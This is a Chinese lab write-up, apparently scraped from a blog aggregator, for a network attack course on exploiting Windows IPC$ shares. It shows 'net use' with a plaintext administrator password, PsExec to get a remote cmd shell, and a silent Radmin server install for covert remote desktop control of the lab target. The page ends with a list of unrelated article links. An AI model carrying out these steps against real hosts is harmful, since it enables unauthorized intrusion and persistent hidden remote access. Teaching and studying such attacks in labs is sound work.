(实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制
来源:互联网 发布:知柏地黄丸怎么服用 编辑:程序博客网 时间:2024/05/16 00:26
实验简介
实验所属系列:网络攻击与对抗
相关课程及专业:信息网络安全概论、计算机网络
实验时数(学分):2学时
实验类别:实践实验类
实验目的
1.了解IPC$漏洞原理
2.掌握IPC$漏洞攻击方法;
3.掌握psExec工具的使用;
4.掌握远程控制工具radmin的使用。
本实验要求实验者具备如下的相关知识。
IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行数据交换,从而实现对远程计算机的访问。IPC$是NT/2000及之后OS的一项新功能。一些别有用心者可以利用黑客工具软件对主机进行IPC$漏洞探测。如果用户设置的口令较弱而被破解,那么通过建立IPC$连接的以下命令,攻击者就可以轻易地进入到系统中进行任意操作。
net use \\远程主机IP “密码” /user: “用户名”与远程主机建立IPC$连接通道
net use z: \\远程主机ip\c$ 将远程主机的C盘影射为本地Z盘
copy e:\a.txt \\远程主机ip\c$ 拷贝本地文件e:\a.txt到远程主机
net use \\远程主机ip /del 删除与远程主机的IPC$连接。
正文开始
0x01.环境准备。
net use \\10.1.1.28“mD4rkpdje” /user: “administrator” //与目标主机建立IPC$连接通道
net use z: \\10.1.1.28\c$ //将目标主机的C盘影射为本地Z盘
0x02.实施攻击
安装radmin软件,将安装目录下的r_server.exe、raddrv.dll、AdmDll.dll拷贝粘贴到映射的z盘,即远程主机的C盘。
利用psexec工具获得对方的Shell。安装psexec工具,cmd中进入psexec.exe工具所在目录:
Psexec.exe \10.1.1.28–u administrator–pmD4rkpdje cmd.exe;
这样就能在我自己的cmd中弹回一个28靶机的cmdshell回来,随意的执行命令。
我们用这个shell来进行安装r_server。
C:\r_server /install /pass:f4ck /:4899 /silence //安装命令
net start r_server //启动命令
运行本地的Radmin输入刚才配置好的密码和端口(我这里是f4ck和 4899)便可以远程桌面受害靶机了。
- (实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制
- (实验经验分享)网络攻击与对抗 > 实验二:利用MalwareDefender保障系统安全
- 实验吧笔记-IPC$管道攻击与防御方法
- 合天lab实验:IPC$管道利用:
- 简单理解与实验生成对抗网络GAN
- 简单理解与实验生成对抗网络GAN
- 简单理解与实验生成对抗网络GAN
- 实验楼Linux学习笔记(九)之 命令执行顺序控制与管道
- 网络安全实验-攻击实验(1)-IPC 攻击
- 远程DNS缓存攻击__山东大学网络攻防实验三
- 蜜罐网络攻击分析实验(网安实验7)
- Linus实验楼笔记——第10节:命令执行顺序控制与管道
- PLC实验六(无相步进电动机控制的模拟)
- 数据压缩原理与应用 实验六 MPEG音频编码实验
- 实验六 基于协议的网络编程
- 实验六 基于协议的网络编程
- java实验六 接口与实现
- 数据结构与算法·实验六
- POJ-3252 Round Numbers
- test
- vc 改变文件大小
- 堆 和 栈的 区别
- Windows多媒体API -低阶(二)
- (实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制
- oracle临时表
- hdu--1856--More is better
- 希尔排序的实现
- Windows多媒体API -低阶(三)
- java位操作、BitSet例程
- IOS 霓虹灯效果(oc)
- toptop
- test2